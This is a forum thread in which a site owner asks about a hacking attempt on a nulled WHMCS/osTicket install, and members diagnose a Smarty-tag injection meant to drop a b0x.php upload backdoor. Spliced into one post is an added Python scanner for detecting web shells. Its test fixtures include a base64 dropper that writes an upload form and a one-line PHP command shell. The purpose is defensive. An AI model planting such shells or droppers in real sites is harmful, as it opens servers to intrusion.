Hacking attempt. What should I do?



tech0925
Forum Commoner
Posts: 47
Joined: Wed Nov 09, 2011 2:46 pm

Hacking attempt. What should I do?

Post by tech0925 »

Please have a look at this:

[Image: screenshot of the attempted injection, not reproduced]

What was the hacker trying to do? How can I protect against this, or do you think the osTicket system is relatively safe? Also, I use an SSL 256-bit encryption certificate and SiteLock. Not sure if that helps, but I just don't want to get hacked. :banghead:

Here is some history,

I just left my old hosting company two days ago. I did not have the above security features and I noticed I was being hacked. The hackers were able to actually upload files to my server although I have never given out access to anyone. The password alone was almost impossible to crack. How they did it I don't know. So I moved my account and secured everything with a different hosting company. In less than 24 hours I got the above hack attempt.

Any advice would be so helpful. Just want to make sure I am not as vulnerable as before.
social_experiment
DevNet Master
Posts: 2793
Joined: Sun Feb 15, 2009 11:08 am
Location: .za

Re: Hacking attempt. What should I do?

Post by social_experiment »

tech0925 wrote:The hackers were able to actually upload files to my server although I have never given out access to anyone. The password alone was almost impossible to crack.
The problem with passwords and secure details is that you are not always 100% in control of them. How did you get them: by email (which is not secure for sending sensitive information)? A disgruntled employee somewhere could have leaked the information.

If the previous hosting company you used isn't able to tell you how the system was compromised, it's a good thing that you stopped using their services.
“Don’t worry if it doesn’t work right. If everything did, you’d be out of a job.” - Mosher’s Law of Software Engineering
tech0925
Forum Commoner
Posts: 47
Joined: Wed Nov 09, 2011 2:46 pm

Re: Hacking attempt. What should I do?

Post by tech0925 »

Thanks!
Eric!
DevNet Resident
Posts: 1146
Joined: Sun Jun 14, 2009 3:13 pm

Re: Hacking attempt. What should I do?

Post by Eric! »

It looks like you probably have a back door shell script installed in your site based on what they were trying to inject. Most likely your system is wide open to abuse now.

I suggest you get Mordred to fix the problem for you. He's our resident security guy for hire: viewtopic.php?f=17&t=129090
tech0925
Forum Commoner
Posts: 47
Joined: Wed Nov 09, 2011 2:46 pm

Re: Hacking attempt. What should I do?

Post by tech0925 »

I did find some files that were flagged by my old hosting company and even picked up by my Mac spyware scanner. I was using a hacked version of WHMCS, which these files were located in. I deleted all of these suspicious files before changing hosting companies. Maybe they were trying to access those, but to no avail. The nulled WHMCS had a support system that I was using. However, I no longer use that. What do you think?
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Hacking attempt. What should I do?

Post by Mordred »

It looks like an attempt to inject a Smarty php tag into the database, hoping that later it will be rendered and the code executed. I can't tell if it was successful from looking at this, but you can check:
The backdoor code will create a file "templates_c/b0x.php" containing a file upload form. Check if you have it on your new hosting.
tech0925
Forum Commoner
Posts: 47
Joined: Wed Nov 09, 2011 2:46 pm

Re: Hacking attempt. What should I do?

Post by tech0925 »

THANK YOU! That was exactly what I wanted to hear. The files that I mentioned earlier that I deleted were all contained in a folder called templates_c, located in that nulled version of WHMCS.

It was not successful! Thanks Mordred!
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Hacking attempt. What should I do?

Post by Mordred »

Hmm. It is normal to have templates_c: this is where Smarty keeps its compiled templates. The dangerous thing is not the folder, but the b0x.php file (that's a zero; be careful when searching).
tech0925
Forum Commoner
Posts: 47
Joined: Wed Nov 09, 2011 2:46 pm

Re: Hacking attempt. What should I do?

Post by tech0925 »

Ok.

I searched my entire server for b0x.php and nothing was found :) How could you tell by looking at that code that it was to create a file called b0x.php? The reason I ask is in case it happens again.

Here are the files that I had to remove before transferring hosting companies.

{HEX}php.uploader.max.535 : ./client/downloads/php/phpinfo.php
{HEX}base64.inject.unclassed.7 : ./client/templates_c/444fcb3d7706a2f520fce00972edf387^%%E1^E1B^E1B755E8%%emailtpl%3Aemailsubject.php
{HEX}base64.inject.unclassed.7 : ./client/templates_c/efb94a2b56c4dc5b09f16bce5f56a61b^%%E1^E1B^E1B755E8%%emailtpl%3Aemailsubject.php
{HEX}base64.inject.unclassed.7 : ./client/templates_c/%%F0^F0C^F0C915F5%%environ%00.tpl.php
{HEX}base64.inject.unclassed.7 : ./client/templates_c/e52dcc2ed92e5d571f2035410502b8b3^%%E1^E1B^E1B755E8%%emailtpl%3Aemailsubject.php
{HEX}base64.inject.unclassed.7 : ./client/templates_c/629a2b4c3bc9b25e3b8b2783b4916a7b^%%E1^E1B^E1B755E8%%emailtpl%3Aemailsubject.php
{HEX}gzbase64.inject.unclassed.14 : ./client/templates_c/q.php
{HEX}base64.inject.unclassed.7 : ./client/templates_c/f6b4df64571de62d9f368301489283e7^%%E1^E1B^E1B755E8%%emailtpl%3Aemailsubject.php
{HEX}base64.inject.unclassed.7 : ./client/templates_c/9334b215f5682cad1498534380f598eb^%%E1^E1B^E1B755E8%%emailtpl%3Aemailsubject.php
{HEX}php.uploader.max.535 : ./client/templates_c/red.php
{HEX}php.cmdshell.unclassed.343 : ./client/wsob2.php
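The scanner output above and Mordred's earlier notes (the injected base64 layer that drops templates_c/b0x.php, and the warning that templates_c itself is normal while the file inside it is not) describe what a post-compromise triage of a web root looks for. The following is an added example, not code from the thread or from any scanner the poster used: a small Python walker that flags files by the same indicator classes the quoted output uses (eval/base64 injection, gz-inflated payloads, upload handlers, command shells, Smarty {php} tags) and, instead of googling the base64 fragment, decodes every base64 literal handed to base64_decode() locally and re-classifies the decoded layer, which is where the dropper's real behaviour lives. The regexes are my own approximations, not the real signatures behind names like {HEX}base64.inject.unclassed.7, and the sample web root it scans is constructed in a temp directory for the example.

```python
import base64
import os
import re
import tempfile

# Indicator classes modelled on the categories in the scanner output quoted in the
# thread. The regexes are assumptions for this example, not that scanner's signatures.
SUSPICIOUS = {
    "base64.inject": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "gzbase64.inject": re.compile(r"gzinflate\s*\(\s*base64_decode\s*\("),
    "php.uploader": re.compile(r"move_uploaded_file\s*\("),
    "php.cmdshell": re.compile(r"\b(?:system|passthru|shell_exec|exec)\s*\(\s*\$_(?:GET|POST|REQUEST)\b"),
    "smarty.php_tag": re.compile(r"\{php\}"),
}
# File names that appeared in the thread; note b0x.php is spelled with a zero.
KNOWN_NAMES = {"b0x.php", "q.php", "red.php", "wsob2.php"}
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]")


def decode_payloads(text):
    """Decode every base64 literal passed to base64_decode() so the hidden
    layer can be read locally instead of being searched for online."""
    layers = []
    for m in B64_LITERAL.finditer(text):
        try:
            layers.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue  # not valid base64, skip it
    return layers


def classify(text):
    return [name for name, rx in SUSPICIOUS.items() if rx.search(text)]


def scan_file(path):
    """Return a finding dict for one file, or None if nothing matched."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    hits = classify(text)
    if os.path.basename(path) in KNOWN_NAMES:
        hits.append("known.name")
    decoded = decode_payloads(text)
    for layer in decoded:
        # the decoded layer is where a dropper's real behaviour usually lives
        hits += [h for h in classify(layer) if h not in hits]
    if not hits:
        return None
    return {"path": path, "name": os.path.basename(path), "hits": hits, "decoded": decoded}


def scan_tree(root):
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            finding = scan_file(os.path.join(dirpath, name))
            if finding:
                finding["path"] = os.path.relpath(finding["path"], root)
                findings.append(finding)
    return sorted(findings, key=lambda f: f["path"])


# Constructed sample web root (not real malware): one benign compiled Smarty
# template, one injected template whose base64 layer drops b0x.php, the dropped
# upload form itself, and a one-line command shell.
DROPPER = (
    "file_put_contents('templates_c/b0x.php', "
    "'<form method=\"post\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"f\"></form>"
    "<?php move_uploaded_file($_FILES[\"f\"][\"tmp_name\"], $_FILES[\"f\"][\"name\"]); ?>');"
)
SAMPLE_FILES = {
    "templates_c/ok.tpl.php": "<?php /* Smarty compiled template */ echo $this->_tpl_vars['subject']; ?>",
    "templates_c/inj.tpl.php": "<?php eval(base64_decode('%s')); ?>"
        % base64.b64encode(DROPPER.encode()).decode(),
    "templates_c/b0x.php": "<form method=\"post\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"f\"></form>"
        "<?php move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']); ?>",
    "wsob2.php": "<?php system($_GET['cmd']); ?>",
}


def build_sample_tree():
    root = tempfile.mkdtemp(prefix="webroot_")
    for rel, body in SAMPLE_FILES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        print(f["path"], f["hits"])
        for layer in f["decoded"]:
            print("  decoded:", layer[:100])
```

On the constructed tree the benign compiled template produces no finding, the injected template is reported as base64.inject and, after decoding, as php.uploader with the decoded layer showing the templates_c/b0x.php target, and b0x.php and wsob2.php are reported both by content and by name. A name-only search (the equivalent of looking for b0x.php) misses the injected template entirely, which is why the content pass matters.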
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Hacking attempt. What should I do?

Post by Mordred »

b0x.php was from the screenshot you posted, of (presumably) your new installation.
There's no guarantee that it was used to compromise your old installation, nor is there a guarantee that some backdoor hasn't survived through whatever you used to dump those files you listed.
You should have reinstalled from a clean copy, not just move files from a compromised host.
tech0925
Forum Commoner
Posts: 47
Joined: Wed Nov 09, 2011 2:46 pm

Re: Hacking attempt. What should I do?

Post by tech0925 »

I understand and thanks so much for the help. What I did was delete the entire script and did not upload to the new hosting company. I no longer use that script since it was compromised. I assumed that the hacker who nulled it probably shared info on how to get in. Thanks again. What I was referring to when asking you how you knew it was called b0x.php was how can you tell by looking at that code. If I see a code again in the future like that, how can I tell what it was trying to do?

Thanks Mordred, you rock buddy!
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Hacking attempt. What should I do?

Post by Mordred »

*shhht, don't tell anyone*: I googled the piece of the base64'ed code visible in your screenshot :)
tech0925
Forum Commoner
Posts: 47
Joined: Wed Nov 09, 2011 2:46 pm

Re: Hacking attempt. What should I do?

Post by tech0925 »

LOL, thanks again for your help :)
Eric!
DevNet Resident
Posts: 1146
Joined: Sun Jun 14, 2009 3:13 pm

Re: Hacking attempt. What should I do?

Post by Eric! »

tech0925, like Mordred said, there's a good chance you still have something else lurking in there. Just because you had someone try to inject a b0x.php backdoor doesn't mean that was what originally compromised your system. In the hacker world, once someone brags about cracking a server, everyone goes out and gives it a shot. It's possible the original back door is still there in the source. Even more possible is that the original hole is still unplugged.

That's when it's handy to have a guy like Mordred test your system and find out how/where/why it was exploited. And unless the hole is patched odds are good they'll be back.
tech0925
Forum Commoner
Posts: 47
Joined: Wed Nov 09, 2011 2:46 pm

Re: Hacking attempt. What should I do?

Post by tech0925 »

Thank you for the advice. Mordred and I are in conversations about correcting issues when he has the time. I think I may have found the script that was the backdoor. Every injected file and hack was going through it. I completely deleted it before transferring files to the new hosting company. Other scripts I re-installed from the new version. Hopefully I found and fixed the issues.

I even found a file known as php.info (I think that is what it was called) that clearly showed everything about my server in that bad script. I assume that was a big help to the hackers. Thanks again!